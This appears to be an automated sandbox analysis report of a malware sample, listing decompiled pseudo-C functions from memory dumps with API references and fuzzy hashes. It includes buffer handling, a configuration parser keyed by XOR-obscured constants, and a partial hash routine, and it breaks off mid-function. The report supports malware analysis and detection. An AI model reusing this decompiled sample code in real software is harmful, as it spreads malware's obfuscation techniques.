                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 3aef49f05321fdb9fee3063f90a7389b12aa23c82f8eaa96c80864cf7521343a
                            • Instruction ID: dcd765e92a79815790836d8ef1351f820005e18bc7c50fab9aa581d442a87e2b
                            • Opcode Fuzzy Hash: 3aef49f05321fdb9fee3063f90a7389b12aa23c82f8eaa96c80864cf7521343a
                            • Instruction Fuzzy Hash: A8B012B9140104EFCE114B50DF04F457E31B764700F03D011F30444070C2314420FB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F12363(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
                            				void* _v8;
                            				int _v12;
                            				char _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				char _v144;
                            				int _v148;
                            				intOrPtr _v152;
                            				intOrPtr _v156;
                            				intOrPtr _v160;
                            				char _v164;
                            				void* _t37;
                            				void* _t42;
                            				void* _t51;
                            				int _t53;
                            				char* _t58; // added: used below but not declared in the decompiler output
                            				void* _t60;
                            				void* _t61; // added: used below but not declared in the decompiler output
                            				void* _t63;
                            				void* _t64;
                            				void* _t73; // added: used below but not declared in the decompiler output
                            
                            				_t53 = 0;
                            				_t60 = __ecx;
                            				_v16 = 0;
                            				_v12 = 0;
                            				_v8 = 0;
                            				if(__ecx <= 0x80 ||  *__eax != 0x400) {
                            					L21:
                            					return _t53;
                            				} else {
                            					_t58 =  &_v164;
                            					_t37 = E00F1A483(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
                            					if(_t37 != 0) {
                            						goto L21;
                            					}
                            					_t61 = _t60 - 0x80;
                            					if(_v148 > _t60 - 0x80) {
                            						goto L21;
                            					}
                            					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
                            						_t37 = _t37 + 1;
                            						if(_t37 < 0x10) {
                            							continue;
                            						}
                            						_t53 = _v148;
                            						_t51 = E00F155DC(_t53);
                            						_t73 = _t51;
                            						_v8 = _t51;
                            						if(_t51 != 0) {
                            							_t53 = 0;
                            							L18:
                            							if(_t53 != 0) {
                            								goto L21;
                            							}
                            							L19:
                            							if(_v8 != 0) {
                            								E00F16DFA(_v8);
                            							}
                            							goto L21;
                            						}
                            						memcpy(_t51, _a4, _t53);
                            						L8:
                            						_t63 = _v8;
                            						E00F16B8E(_t58, _t73, _t63, _t53,  &_v32);
                            						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
                            							L15:
                            							_t53 = 0;
                            							goto L19;
                            						} else {
                            							 *_a8 = _t63;
                            							goto L18;
                            						}
                            					}
                            					_t42 = E00F16E7F(_t61, _a4,  &_v8,  &_v12,  &_v144, 0); // executed
                            					__eflags = _t42;
                            					if(_t42 != 0) {
                            						_t53 = _v12;
                            						goto L18;
                            					}
                            					_t53 = _v148;
                            					__eflags = _v12 - _t53;
                            					if(__eflags >= 0) {
                            						goto L8;
                            					}
                            					goto L15;
                            				}
                            			}


                            APIs
                            • memcpy.NTDLL(00000000,?,?,?,?,?,00000001,?,00000001,?), ref: 00F123EA
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: memcpy
                            • String ID:
                            • API String ID: 3510742995-0
                            • Opcode ID: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                            • Instruction ID: 92503cc3d4365912c9fdab8b36953b40f576e83d007e9644364890b3fda05a7b
                            • Opcode Fuzzy Hash: 33001e3b9a6cb1d0f9a6f5c8c82e8a7ada59412a574fd8dff2d869cb30235c3d
                            • Instruction Fuzzy Hash: A5313871E00219EFDF61DEE8C880BEEB7B8BB14314F1040A9E559A3142D6749ED5AF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F1A415(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
                            				void* _t24;
                            				signed short _t25;
                            				signed int _t27;
                            				intOrPtr* _t28;
                            				signed short _t29;
                            
                            				_t28 = __edi;
                            				if(_a4 == 0) {
                            					L2:
                            					_t29 = E00F15607(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                            					if(_t29 == 0) {
                            						_t27 = _a12 >> 1;
                            						if(_t27 == 0) {
                            							_t29 = 2;
                            							HeapFree( *0xf1d270, 0, _a4);
                            						} else {
                            							_t24 = _a4;
                            							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
                            							 *_t28 = _t24;
                            						}
                            					}
                            					L6:
                            					return _t29;
                            				}
                            				_t25 = E00F13196(_a4, _a8, _a12, __edi); // executed
                            				_t29 = _t25;
                            				if(_t29 == 0) {
                            					goto L6;
                            				}
                            				goto L2;
                            			}


                            APIs
                              • Part of subcall function 00F13196: SysFreeString.OLEAUT32(00000000), ref: 00F131FC
                            • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,7519F710,?,00000000,?,00000000,?,00F14C93,?,?,057F93B8,00000000,?), ref: 00F1A476
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Free$HeapString
                            • String ID:
                            • API String ID: 3806048269-0
                            • Opcode ID: 2afb285bf36493a953f0e14c06b370edd1e2ad8027eca39b1deaa1bcad946d8a
                            • Instruction ID: 2f8a0f4fa7ba016f08204d186ab86ce00b3e2b62ed908842112a7808f94731e2
                            • Opcode Fuzzy Hash: 2afb285bf36493a953f0e14c06b370edd1e2ad8027eca39b1deaa1bcad946d8a
                            • Instruction Fuzzy Hash: A2014632402659FBCB229F84CC09FEA3B65FB087A0F058029FE049A121C771D9A0EBD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F14FA0(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
                            				intOrPtr _t14; // added: used below but neither declared nor assigned in the decompiler output
                            				void* _t17;
                            
                            				if(_a4 == 0) {
                            					L2:
                            					return E00F188FF(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                            				}
                            				_t17 = E00F1262B(_a4, _a8, _a12, _a16, _a20); // executed
                            				if(_t17 != 0) {
                            					goto L2;
                            				}
                            				return _t17;
                            			}


                            APIs
                            • lstrlenW.KERNEL32(?,?,?,00F14AAE,3D00F1C0,80000002,00F16096,00F1A6E1,?,?,00F1A6E1,?,3D00F1C0,80000002,00F16096,?), ref: 00F14FC5
                              • Part of subcall function 00F1262B: SysAllocString.OLEAUT32(00F1A6E1), ref: 00F12645
                              • Part of subcall function 00F1262B: SysFreeString.OLEAUT32(00000000), ref: 00F12685
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: String$AllocFreelstrlen
                            • String ID:
                            • API String ID: 3808004451-0
                            • Opcode ID: ed7ef240eabf3413ce8848af6cf23990a78a44a5d1bf1bd16f25b6b35cb58d87
                            • Instruction ID: 6ff7d695f2a95423c6bf91e21db3da9dc85f3b52bf103d3ad550bc239c556b57
                            • Opcode Fuzzy Hash: ed7ef240eabf3413ce8848af6cf23990a78a44a5d1bf1bd16f25b6b35cb58d87
                            • Instruction Fuzzy Hash: 6FF07F3200420EBBDF069F90ED06EDA3F6AEB08350F058014BA0455161DB32D9B2FBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F16A16(void* __edi, void* _a4) {
                            				int _t7;
                            				int _t12;
                            
                            				_t7 = E00F160DD(__edi, _a4,  &_a4); // executed
                            				_t12 = _t7;
                            				if(_t12 != 0) {
                            					memcpy(__edi, _a4, _t12);
                            					 *((char*)(__edi + _t12)) = 0;
                            					E00F16DFA(_a4);
                            				}
                            				return _t12;
                            			}

                            APIs
                              • Part of subcall function 00F160DD: memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 00F16113
                              • Part of subcall function 00F160DD: memset.NTDLL ref: 00F16188
                              • Part of subcall function 00F160DD: memset.NTDLL ref: 00F1619C
                            • memcpy.NTDLL(?,?,00000000,?,?,?,?,?,00F15BE3,?,?,00F1512B,00000002,?,?,?), ref: 00F16A32
                              • Part of subcall function 00F16DFA: RtlFreeHeap.NTDLL(00000000,00000000,00F155CD,00000000,?,?,00000000), ref: 00F16E06
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: memcpymemset$FreeHeap
                            • String ID:
                            • API String ID: 3053036209-0
                            • Opcode ID: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                            • Instruction ID: f30a2e6144714fbda3863cc904b5ceebb0ba72f81206825af0fa39743f94d18c
                            • Opcode Fuzzy Hash: 1de2f2b2d369184cfa0738fd9f5a90c1c0e5296654ede8fae6ba90d5d4c21a8e
                            • Instruction Fuzzy Hash: DDE08637501128B7C7122A94DC01DEB7F5DCF557A0F044020FD0895101E639C590A3E2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            C-Code - Quality: 92%
                            			E00F1294D(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                            				int _v8;
                            				void* _v12;
                            				void* _v16;
                            				signed int _t28;
                            				signed int _t33;
                            				signed int _t39;
                            				char* _t45;
                            				char* _t46;
                            				char* _t47;
                            				char* _t48;
                            				char* _t49;
                            				char* _t50;
                            				void* _t51;
                            				void* _t52;
                            				void* _t53;
                            				intOrPtr _t54;
                            				void* _t56;
                            				intOrPtr _t57;
                            				intOrPtr _t58;
                            				signed int _t61;
                            				intOrPtr _t64;
                            				signed int _t65;
                            				signed int _t70;
                            				void* _t72;
                            				void* _t73;
                            				signed int _t75;
                            				signed int _t78;
                            				signed int _t82;
                            				signed int _t86;
                            				signed int _t90;
                            				signed int _t94;
                            				signed int _t98;
                            				void* _t101;
                            				void* _t102;
                            				void* _t115;
                            				void* _t118;
                            				intOrPtr _t121;
                            
                            				_t118 = __esi;
                            				_t115 = __edi;
                            				_t104 = __ecx;
                            				_t101 = __ebx;
                            				_t28 =  *0xf1d2b4; // 0x69b25f44
                            				if(E00F15740( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                            					 *0xf1d308 = _v8;
                            				}
                            				_t33 =  *0xf1d2b4; // 0x69b25f44
                            				if(E00F15740( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                            					_v12 = 2;
                            					L69:
                            					return _v12;
                            				}
                            				_t39 =  *0xf1d2b4; // 0x69b25f44
                            				_push(_t115);
                            				if(E00F15740( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                            					L67:
                            					HeapFree( *0xf1d270, 0, _v16);
                            					goto L69;
                            				} else {
                            					_push(_t101);
                            					_t102 = _v12;
                            					if(_t102 == 0) {
                            						_t45 = 0;
                            					} else {
                            						_t98 =  *0xf1d2b4; // 0x69b25f44
                            						_t45 = E00F14F59(_t104, _t102, _t98 ^ 0x7895433b);
                            					}
                            					_push(_t118);
                            					if(_t45 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                            							 *0xf1d278 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t46 = 0;
                            					} else {
                            						_t94 =  *0xf1d2b4; // 0x69b25f44
                            						_t46 = E00F14F59(_t104, _t102, _t94 ^ 0x219b08c7);
                            					}
                            					if(_t46 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                            							 *0xf1d27c = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t47 = 0;
                            					} else {
                            						_t90 =  *0xf1d2b4; // 0x69b25f44
                            						_t47 = E00F14F59(_t104, _t102, _t90 ^ 0x31fc0661);
                            					}
                            					if(_t47 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                            							 *0xf1d280 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t48 = 0;
                            					} else {
                            						_t86 =  *0xf1d2b4; // 0x69b25f44
                            						_t48 = E00F14F59(_t104, _t102, _t86 ^ 0x0cd926ce);
                            					}
                            					if(_t48 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                            							 *0xf1d004 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t49 = 0;
                            					} else {
                            						_t82 =  *0xf1d2b4; // 0x69b25f44
                            						_t49 = E00F14F59(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                            					}
                            					if(_t49 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                            							 *0xf1d02c = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t50 = 0;
                            					} else {
                            						_t78 =  *0xf1d2b4; // 0x69b25f44
                            						_t50 = E00F14F59(_t104, _t102, _t78 ^ 0x2878b929);
                            					}
                            					if(_t50 == 0) {
                            						L41:
                            						 *0xf1d284 = 5;
                            						goto L42;
                            					} else {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                            							goto L41;
                            						} else {
                            							L42:
                            							if(_t102 == 0) {
                            								_t51 = 0;
                            							} else {
                            								_t75 =  *0xf1d2b4; // 0x69b25f44
                            								_t51 = E00F14F59(_t104, _t102, _t75 ^ 0x261a367a);
                            							}
                            							if(_t51 != 0) {
                            								_push(_t51);
                            								_t72 = 0x10;
                            								_t73 = E00F12C74(_t72);
                            								if(_t73 != 0) {
                            									_push(_t73);
                            									E00F14D70();
                            								}
                            							}
                            							if(_t102 == 0) {
                            								_t52 = 0;
                            							} else {
                            								_t70 =  *0xf1d2b4; // 0x69b25f44
                            								_t52 = E00F14F59(_t104, _t102, _t70 ^ 0xb9d404b2);
                            							}
                            							if(_t52 != 0 && E00F12C74(0, _t52) != 0) {
                            								_t121 =  *0xf1d35c; // 0x57f95b0
                            								E00F13A19(_t121 + 4, _t68);
                            							}
                            							if(_t102 == 0) {
                            								_t53 = 0;
                            							} else {
                            								_t65 =  *0xf1d2b4; // 0x69b25f44
                            								_t53 = E00F14F59(_t104, _t102, _t65 ^ 0x3df17130);
                            							}
                            							if(_t53 == 0) {
                            								L59:
                            								_t54 =  *0xf1d2b8; // 0x48da5a8
                            								 *0xf1d304 = _t54 + 0xf1e252;
                            								goto L60;
                            							} else {
                            								_t64 = E00F12C74(0, _t53);
                            								 *0xf1d304 = _t64;
                            								if(_t64 != 0) {
                            									L60:
                            									if(_t102 == 0) {
                            										_t56 = 0;
                            									} else {
                            										_t61 =  *0xf1d2b4; // 0x69b25f44
                            										_t56 = E00F14F59(_t104, _t102, _t61 ^ 0xd2079859);
                            									}
                            									if(_t56 == 0) {
                            										_t57 =  *0xf1d2b8; // 0x48da5a8
                            										_t58 = _t57 + 0xf1e79a;
                            									} else {
                            										_t58 = E00F12C74(0, _t56);
                            									}
                            									 *0xf1d370 = _t58;
                            									HeapFree( *0xf1d270, 0, _t102);
                            									_v12 = 0;
                            									goto L67;
                            								}
                            								goto L59;
                            							}
                            						}
                            					}
                            				}
                            			}

                            APIs
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F129F2
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12A24
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12A56
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12A88
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12ABA
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,00F1D00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 00F12AEC
                            • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 00F12BEB
                            • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 00F12BFF
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: ffc3e362b3e1173d1b9dccc9724af398ba96d9a614f13d62efef3f8cf17d0a58
                            • Instruction ID: d0d2af073dca677e82ef453c2e52b6032a63928c189a0a0d4d61d10e1c6adc4d
                            • Opcode Fuzzy Hash: ffc3e362b3e1173d1b9dccc9724af398ba96d9a614f13d62efef3f8cf17d0a58
                            • Instruction Fuzzy Hash: 7581A471A00209EECBA0EBF49DC4DEF77F9AB887107258925A011D7214E679DD95BB20
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E00F13373(void* __ecx, intOrPtr* _a4) {
                            				signed int _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				intOrPtr _v20;
                            				intOrPtr _v24;
                            				intOrPtr _v28;
                            				intOrPtr _v32;
                            				intOrPtr _v36;
                            				intOrPtr _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				void _v76;
                            				intOrPtr* _t226;
                            				signed int _t229;
                            				signed int _t231;
                            				signed int _t233;
                            				signed int _t235;
                            				signed int _t237;
                            				signed int _t239;
                            				signed int _t241;
                            				signed int _t243;
                            				signed int _t245;
                            				signed int _t247;
                            				signed int _t249;
                            				signed int _t251;
                            				signed int _t253;
                            				signed int _t255;
                            				signed int _t257;
                            				signed int _t259;
                            				signed int _t274;
                            				signed int _t337;
                            				void* _t347;
                            				signed int _t348;
                            				signed int _t350;
                            				signed int _t352;
                            				signed int _t354;
                            				signed int _t356;
                            				signed int _t358;
                            				signed int _t360;
                            				signed int _t362;
                            				signed int _t364;
                            				signed int _t366;
                            				signed int _t375;
                            				signed int _t377;
                            				signed int _t379;
                            				signed int _t381;
                            				signed int _t383;
                            				intOrPtr* _t399;
                            				signed int _t407;
                            				signed int _t409;
                            				signed int _t411;
                            				signed int _t413;
                            				signed int _t415;
                            				signed int _t417;
                            				signed int _t419;
                            				signed int _t421;
                            				signed int _t423;
                            				signed int _t425;
                            				signed int _t427;
                            				signed int _t429;
                            				signed int _t437;
                            				signed int _t439;
                            				signed int _t441;
                            				signed int _t443;
                            				signed int _t445;
                            				void* _t447;
                            				signed int _t507;
                            				signed int _t598;
                            				signed int _t606;
                            				signed int _t612;
                            				signed int _t678;
                            				signed int* _t681;
                            				signed int _t682;
                            				signed int _t684;
                            				signed int _t689;
                            				signed int _t691;
                            				signed int _t696;
                            				signed int _t698;
                            				signed int _t717;
                            				signed int _t719;
                            				signed int _t721;
                            				signed int _t723;
                            				signed int _t725;
                            				signed int _t727;
                            				signed int _t733;
                            				signed int _t739;
                            				signed int _t741;
                            				signed int _t743;
                            				signed int _t745;
                            				signed int _t747;
                            
                            				_t226 = _a4;
                            				_t347 = __ecx + 2;
                            				_t681 =  &_v76;
                            				_t447 = 0x10;
                            				do {
                            					_t274 =  *(_t347 - 1) & 0x000000ff;
                            					_t347 = _t347 + 4;
                            					 *_t681 = (0 << 0x00000008 | _t274) << 0x00000008 |  *(_t347 - 6) & 0x000000ff;
                            					_t681 =  &(_t681[1]);
                            					_t447 = _t447 - 1;
                            				} while (_t447 != 0);
                            				_t6 = _t226 + 4; // 0x14eb3fc3
                            				_t682 =  *_t6;
                            				_t7 = _t226 + 8; // 0x8d08458b
                            				_t407 =  *_t7;
                            				_t8 = _t226 + 0xc; // 0x56c1184c
                            				_t348 =  *_t8;
                            				asm("rol eax, 0x7");
                            				_t229 = ( !_t682 & _t348 | _t407 & _t682) + _v76 +  *_t226 - 0x28955b88 + _t682;
                            				asm("rol ecx, 0xc");
                            				_t350 = ( !_t229 & _t407 | _t682 & _t229) + _v72 + _t348 - 0x173848aa + _t229;
                            				asm("ror edx, 0xf");
                            				_t409 = ( !_t350 & _t682 | _t350 & _t229) + _v68 + _t407 + 0x242070db + _t350;
                            				asm("ror esi, 0xa");
                            				_t684 = ( !_t409 & _t229 | _t350 & _t409) + _v64 + _t682 - 0x3e423112 + _t409;
                            				_v8 = _t684;
                            				_t689 = _v8;
                            				asm("rol eax, 0x7");
                            				_t231 = ( !_t684 & _t350 | _t409 & _v8) + _v60 + _t229 - 0xa83f051 + _t689;
                            				asm("rol ecx, 0xc");
                            				_t352 = ( !_t231 & _t409 | _t689 & _t231) + _v56 + _t350 + 0x4787c62a + _t231;
                            				asm("ror edx, 0xf");
                            				_t411 = ( !_t352 & _t689 | _t352 & _t231) + _v52 + _t409 - 0x57cfb9ed + _t352;
                            				asm("ror esi, 0xa");
                            				_t691 = ( !_t411 & _t231 | _t352 & _t411) + _v48 + _t689 - 0x2b96aff + _t411;
                            				_v8 = _t691;
                            				_t696 = _v8;
                            				asm("rol eax, 0x7");
                            				_t233 = ( !_t691 & _t352 | _t411 & _v8) + _v44 + _t231 + 0x698098d8 + _t696;
                            				asm("rol ecx, 0xc");
                            				_t354 = ( !_t233 & _t411 | _t696 & _t233) + _v40 + _t352 - 0x74bb0851 + _t233;
                            				asm("ror edx, 0xf");
                            				_t413 = ( !_t354 & _t696 | _t354 & _t233) + _v36 + _t411 - 0xa44f + _t354;
                            				asm("ror esi, 0xa");
                            				_t698 = ( !_t413 & _t233 | _t354 & _t413) + _v32 + _t696 - 0x76a32842 + _t413;
                            				_v8 = _t698;
                            				asm("rol eax, 0x7");
                            				_t235 = ( !_t698 & _t354 | _t413 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                            				asm("rol ecx, 0xc");
                            				_t356 = ( !_t235 & _t413 | _v8 & _t235) + _v24 + _t354 - 0x2678e6d + _t235;
                            				_t507 =  !_t356;
                            				asm("ror edx, 0xf");
                            				_t415 = (_t507 & _v8 | _t356 & _t235) + _v20 + _t413 - 0x5986bc72 + _t356;
                            				_v12 = _t415;
                            				_v12 =  !_v12;
                            				asm("ror esi, 0xa");
                            				_t717 = (_v12 & _t235 | _t356 & _t415) + _v16 + _v8 + 0x49b40821 + _t415;
                            				asm("rol eax, 0x5");
                            				_t237 = (_t507 & _t415 | _t356 & _t717) + _v72 + _t235 - 0x9e1da9e + _t717;
                            				asm("rol ecx, 0x9");
                            				_t358 = (_v12 & _t717 | _t415 & _t237) + _v52 + _t356 - 0x3fbf4cc0 + _t237;
                            				asm("rol edx, 0xe");
                            				_t417 = ( !_t717 & _t237 | _t358 & _t717) + _v32 + _t415 + 0x265e5a51 + _t358;
                            				asm("ror esi, 0xc");
                            				_t719 = ( !_t237 & _t358 | _t417 & _t237) + _v76 + _t717 - 0x16493856 + _t417;
                            				asm("rol eax, 0x5");
                            				_t239 = ( !_t358 & _t417 | _t358 & _t719) + _v56 + _t237 - 0x29d0efa3 + _t719;
                            				asm("rol ecx, 0x9");
                            				_t360 = ( !_t417 & _t719 | _t417 & _t239) + _v36 + _t358 + 0x2441453 + _t239;
                            				asm("rol edx, 0xe");
                            				_t419 = ( !_t719 & _t239 | _t360 & _t719) + _v16 + _t417 - 0x275e197f + _t360;
                            				asm("ror esi, 0xc");
                            				_t721 = ( !_t239 & _t360 | _t419 & _t239) + _v60 + _t719 - 0x182c0438 + _t419;
                            				asm("rol eax, 0x5");
                            				_t241 = ( !_t360 & _t419 | _t360 & _t721) + _v40 + _t239 + 0x21e1cde6 + _t721;
                            				asm("rol ecx, 0x9");
                            				_t362 = ( !_t419 & _t721 | _t419 & _t241) + _v20 + _t360 - 0x3cc8f82a + _t241;
                            				asm("rol edx, 0xe");
                            				_t421 = ( !_t721 & _t241 | _t362 & _t721) + _v64 + _t419 - 0xb2af279 + _t362;
                            				asm("ror esi, 0xc");
                            				_t723 = ( !_t241 & _t362 | _t421 & _t241) + _v44 + _t721 + 0x455a14ed + _t421;
                            				asm("rol eax, 0x5");
                            				_t243 = ( !_t362 & _t421 | _t362 & _t723) + _v24 + _t241 - 0x561c16fb + _t723;
                            				asm("rol ecx, 0x9");
                            				_t364 = ( !_t421 & _t723 | _t421 & _t243) + _v68 + _t362 - 0x3105c08 + _t243;
                            				asm("rol edx, 0xe");
                            				_t423 = ( !_t723 & _t243 | _t364 & _t723) + _v48 + _t421 + 0x676f02d9 + _t364;
                            				asm("ror esi, 0xc");
                            				_t725 = ( !_t243 & _t364 | _t423 & _t243) + _v28 + _t723 - 0x72d5b376 + _t423;
                            				asm("rol eax, 0x4");
                            				_t245 = (_t364 ^ _t423 ^ _t725) + _v56 + _t243 - 0x5c6be + _t725;
                            				asm("rol ecx, 0xb");
                            				_t366 = (_t423 ^ _t725 ^ _t245) + _v44 + _t364 - 0x788e097f + _t245;
                            				asm("rol edx, 0x10");
                            				_t425 = (_t366 ^ _t725 ^ _t245) + _v32 + _t423 + 0x6d9d6122 + _t366;
                            				_t598 = _t366 ^ _t425;
                            				asm("ror esi, 0x9");
                            				_t727 = (_t598 ^ _t245) + _v20 + _t725 - 0x21ac7f4 + _t425;
                            				asm("rol eax, 0x4");
                            				_t247 = (_t598 ^ _t727) + _v72 + _t245 - 0x5b4115bc + _t727;
                            				asm("rol edi, 0xb");
                            				_t606 = (_t425 ^ _t727 ^ _t247) + _v60 + _t366 + 0x4bdecfa9 + _t247;
                            				asm("rol edx, 0x10");
                            				_t427 = (_t606 ^ _t727 ^ _t247) + _v48 + _t425 - 0x944b4a0 + _t606;
                            				_t337 = _t606 ^ _t427;
                            				asm("ror ecx, 0x9");
                            				_t375 = (_t337 ^ _t247) + _v36 + _t727 - 0x41404390 + _t427;
                            				asm("rol eax, 0x4");
                            				_t249 = (_t337 ^ _t375) + _v24 + _t247 + 0x289b7ec6 + _t375;
                            				asm("rol esi, 0xb");
                            				_t733 = (_t427 ^ _t375 ^ _t249) + _v76 + _t606 - 0x155ed806 + _t249;
                            				asm("rol edi, 0x10");
                            				_t612 = (_t733 ^ _t375 ^ _t249) + _v64 + _t427 - 0x2b10cf7b + _t733;
                            				_t429 = _t733 ^ _t612;
                            				asm("ror ecx, 0x9");
                            				_t377 = (_t429 ^ _t249) + _v52 + _t375 + 0x4881d05 + _t612;
                            				asm("rol eax, 0x4");
                            				_t251 = (_t429 ^ _t377) + _v40 + _t249 - 0x262b2fc7 + _t377;
                            				asm("rol edx, 0xb");
                            				_t437 = (_t612 ^ _t377 ^ _t251) + _v28 + _t733 - 0x1924661b + _t251;
                            				asm("rol esi, 0x10");
                            				_t739 = (_t437 ^ _t377 ^ _t251) + _v16 + _t612 + 0x1fa27cf8 + _t437;
                            				asm("ror ecx, 0x9");
                            				_t379 = (_t437 ^ _t739 ^ _t251) + _v68 + _t377 - 0x3b53a99b + _t739;
                            				asm("rol eax, 0x6");
